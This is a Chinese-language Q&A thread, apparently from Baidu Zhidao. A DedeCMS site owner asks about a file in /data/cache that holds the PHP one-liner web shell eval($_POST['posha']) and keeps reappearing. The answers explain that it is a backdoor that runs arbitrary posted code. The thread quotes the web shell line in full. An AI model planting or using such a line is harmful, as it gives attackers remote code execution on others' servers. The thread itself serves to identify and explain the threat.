网站中出现<?php eval($_POST['posha']);?> 这段代码?什么意思?

DEDECMS后台病毒检测哪里,检测出一个php的文件,在/data/cache/这个文件夹下有这个po.php文件,我查看了一下源代码,只有一句话“<?phpeval(... DEDECMS后台病毒检测哪里,检测出一个php的文件,在/data/cache/这个文件夹下有这个po.php文件,我查看了一下源代码,只有一句话“<?php eval($_POST['posha']);?> ” 请问这句话什么意思,我在网上搜了一下,不是很了解,谁能告诉我这句代码做什么用的,我在空间里删除了之后又出现了这个文件,删除不掉,怎么办啊,是不是中毒了?如何防范这种代码?在哪里彻底清除啊?谢谢!!! 展开
 我来答
那段逝去的过往
2017-07-19 · TA获得超过471个赞
知道小有建树答主
回答量:458
采纳率:83%
帮助的人:313万
展开全部

这是一个典型的后门程序,首先我解释一下eval函数的作用,

//eval — 把字符串作为PHP代码执行 
eval('echo 123;');//输出123

也就是说,所有的字符串放入到eval当中,eval会把字符串解析为php代码来进行执行,那么结合$_POST['posha']的话,只要使用post传输时在name为posha的值中写入任何字符串,都可以当做php代码来执行,这个时候就有点可怕了,比如写入一段循环删除整站代码等等。

匿名用户
2013-06-26
展开全部
eval() 函数把字符串按照 PHP 代码来计算。
<?php$string = "beautiful";$time = "winter";$str = 'This is a $string $time morning!';echo $str. "
";eval("\$str = \"$str\";");echo $str;?>

This is a $string $time morning!This is a beautiful winter morning!

就是说$_POST['posha']里面存的是\$str = \"$str\";像这样php代码的字符串。
本回答被网友采纳
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
匿名用户
2013-06-26
展开全部
很明显,这是一个php后门程序,通过这个可以在你的服务器上执行任意php代码!
本回答被网友采纳
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
收起 更多回答(1)
推荐律师服务: 若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询

为你推荐:

下载百度知道APP,抢鲜体验
使用百度知道APP,立即抢鲜体验。你的手机镜头里或许有别人想知道的答案。
扫描二维码下载
×

类别

我们会通过消息、邮箱等方式尽快将举报结果通知您。

说明

0/200

提交
取消

辅 助

模 式